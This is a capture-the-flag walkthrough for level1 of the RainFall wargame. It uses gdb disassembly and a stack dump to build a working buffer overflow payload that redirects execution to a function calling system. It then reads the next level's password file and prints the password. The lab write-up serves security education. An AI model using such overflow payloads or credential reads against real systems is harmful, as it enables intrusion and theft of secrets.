gbrochar
/
RainFall
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
RainFall/level1/Ressources/walktrough.md

3.2 KiB
Raw Blame History

Code has 2 functions which are interesting, main and run. We need to execute run, for this we are going to use a buffer overflow attack. For this we've got to input more than the 64 bits allocated for gets command. We are going to override the stack so the ret command jump to run function.

0x08048480 <main+0>:	push   ebp
0x08048481 <main+1>:	mov    ebp,esp
0x08048483 <main+3>:	and    esp,0xfffffff0
0x08048486 <main+6>:	sub    esp,0x50
0x08048489 <main+9>:	lea    eax,[esp+0x10]
0x0804848d <main+13>:	mov    DWORD PTR [esp],eax
0x08048490 <main+16>:	call   0x8048340 <gets@plt>
0x08048495 <main+21>:	leave  
0x08048496 <main+22>:	ret

0x08048444 <run+0>:		push   ebp
0x08048445 <run+1>:		mov    ebp,esp
0x08048447 <run+3>:		sub    esp,0x18
0x0804844a <run+6>:		mov    eax,ds:0x80497c0
0x0804844f <run+11>:	mov    edx,eax
0x08048451 <run+13>:	mov    eax,0x8048570
0x08048456 <run+18>:	mov    DWORD PTR [esp+0xc],edx
0x0804845a <run+22>:	mov    DWORD PTR [esp+0x8],0x13
0x08048462 <run+30>:	mov    DWORD PTR [esp+0x4],0x1
0x0804846a <run+38>:	mov    DWORD PTR [esp],eax
0x0804846d <run+41>:	call   0x8048350 <fwrite@plt>
0x08048472 <run+46>:	mov    DWORD PTR [esp],0x8048584
0x08048479 <run+53>:	call   0x8048360 <system@plt>
0x0804847e <run+58>:	leave
0x0804847f <run+59>:	ret

Fig 1. Disassembly of main and run functions

The first step is to find where the ret address is stored, for this, we will stop the program just before it begins running main and check esp register's value.

Reading symbols from /home/user/level1/level1...(no debugging symbols found)...done.
(gdb) b *main+0
Breakpoint 1 at 0x8048480
(gdb) run
Starting program: /home/user/level1/level1 

Breakpoint 1, 0x08048480 in main ()
(gdb) p $esp
$1 = (void *) 0xbffff73c
(gdb)

Now we need to go to the gets and input 64 random characters and try to see them on the stack

Breakpoint 1, 0x08048495 in main ()
(gdb) x/128xb $esp
0xbffff6e0:	0xf0	0xf6	0xff	0xbf	0x2f	0x00	0x00	0x00
0xbffff6e8:	0x3c	0xf7	0xff	0xbf	0xf4	0x0f	0xfd	0xb7
0xbffff6f0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff6f8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff700:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff708:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff710:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff718:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff720:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff728:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff730:	0x00	0x84	0x04	0x08	0x00	0x00	0x00	0x00
0xbffff738:	0x00	0x00	0x00	0x00	0xd3	0x54	0xe4	0xb7
0xbffff740:	0x01	0x00	0x00	0x00	0xd4	0xf7	0xff	0xbf
0xbffff748:	0xdc	0xf7	0xff	0xbf	0x58	0xc8	0xfd	0xb7
0xbffff750:	0x00	0x00	0x00	0x00	0x1c	0xf7	0xff	0xbf
0xbffff758:	0xdc	0xf7	0xff	0xbf	0x00	0x00	0x00	0x00

We can see our 64 'A's in the stack, notice there is some space before 0xbffff73c. That means we still need to put more 'A's, 12 precisely, then the address we want to jump to.

(python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1

Good... Wait what?
whoami
level2
cat /home/user/level2/.pass
53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77

:)